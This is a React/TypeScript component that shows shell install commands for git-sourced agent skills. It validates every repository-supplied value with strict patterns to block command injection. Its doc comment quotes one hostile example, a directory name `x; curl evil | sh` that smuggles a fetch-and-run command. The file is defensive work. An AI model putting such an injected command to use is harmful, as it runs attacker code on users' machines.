import { Box, Typography } from '@mui/material';
import { CommandBlock } from '../CommandBlock';
import type { InstallInstructionsProps } from './types';

/**
 * **Every value is checked against a strict pattern before it reaches a command.**
 * These strings come from a repository nobody here controls (a directory name, a
 * plugin name), and a reader will paste what is shown into a terminal, so a
 * directory called `x; curl evil | sh` must never be drawn as part of one. A value
 * that does not match is left out with the route that needed it, rather than
 * quoted: a quoting rule is one more thing to get wrong, and a skill with an odd
 * name is not one to hand-install.
 */
const KEBAB_CASE = /^[a-z0-9]+(?:-[a-z0-9]+)*$/;
const MARKETPLACE = /^[A-Za-z0-9][A-Za-z0-9-]{0,38}\/[A-Za-z0-9._-]{1,100}$/;
const CLONE_URL = /^https:\/\/github\.com\/[A-Za-z0-9][A-Za-z0-9-]{0,38}\/([A-Za-z0-9._-]{1,100})\.git$/;
const SKILL_PATH = /^[A-Za-z0-9._-]+(?:\/[A-Za-z0-9._-]+)*$/;

const isSafePath = (path: string): boolean =>
  path === '' || (SKILL_PATH.test(path) && path.split('/').every((segment) => segment !== '.' && segment !== '..'));

/**
 * How to install a git-sourced skill, by the two routes a skill repository's own
 * README gives: a marketplace, when the plugin is listed in one, and a clone with
 * a symlink into the harness's skills directory, which any harness that follows
 * the Agent Skills standard reads.
 *
 * **Claude Code is the harness the commands are written for**; `~/.agents/skills`
 * is the harness-neutral location the others read, and both links are made.
 */
export const InstallInstructions = ({ name, install, cloneUrl }: InstallInstructionsProps) => {
  const { pluginName, marketplace, skillPath } = install;

  const clone = CLONE_URL.exec(cloneUrl);
  const repo = clone?.[1];

  const viaMarketplace =
    marketplace !== undefined &&
    MARKETPLACE.test(marketplace) &&
    pluginName !== undefined &&
    KEBAB_CASE.test(pluginName)
      ? `claude plugin marketplace add ${marketplace}\nclaude plugin install ${pluginName}`
      : undefined;

  const checkout = repo === undefined ? undefined : `~/workspace/${repo}`;
  const skillDirectory =
    checkout === undefined || !isSafePath(skillPath) || !KEBAB_CASE.test(name)
      ? undefined
      : `${checkout}${skillPath === '' ? '' : `/${skillPath}`}`;

  const viaSymlink =
    skillDirectory === undefined
      ? undefined
      : [
          `git clone ${cloneUrl} ${String(checkout)}`,
          'mkdir -p ~/.agents/skills ~/.claude/skills',
          `ln -s ${skillDirectory} ~/.agents/skills/${name}`,
          `ln -s ${skillDirectory} ~/.claude/skills/${name}`,
        ].join('\n');

  if (viaMarketplace === undefined && viaSymlink === undefined) {
    return (
      <Typography variant="body2" sx={{ color: 'text.secondary' }}>
        There are no install instructions for this version. Open its repository for the maintainers&apos; own.
      </Typography>
    );
  }

  return (
    <Box sx={{ display: 'flex', flexDirection: 'column', gap: 5 }}>
      {viaMarketplace !== undefined && (
        <Box sx={{ display: 'flex', flexDirection: 'column', gap: 2 }}>
          <Typography variant="body2" sx={{ fontWeight: 600 }}>
            Claude Code, from the marketplace
          </Typography>
          <CommandBlock>{viaMarketplace}</CommandBlock>
          <Typography variant="body2" sx={{ color: 'text.secondary' }}>
            Later, <code>claude plugin update {pluginName}</code> picks up a new version.
          </Typography>
        </Box>
      )}

      {viaSymlink !== undefined && (
        <Box sx={{ display: 'flex', flexDirection: 'column', gap: 2 }}>
          <Typography variant="body2" sx={{ fontWeight: 600 }}>
            By symlink, in any harness
          </Typography>
          <CommandBlock>{viaSymlink}</CommandBlock>
          <Typography variant="body2" sx={{ color: 'text.secondary' }}>
            You need access to the repository. Updating is <code>git pull</code>; start a new session
            afterwards.
          </Typography>
        </Box>
      )}
    </Box>
  );
};
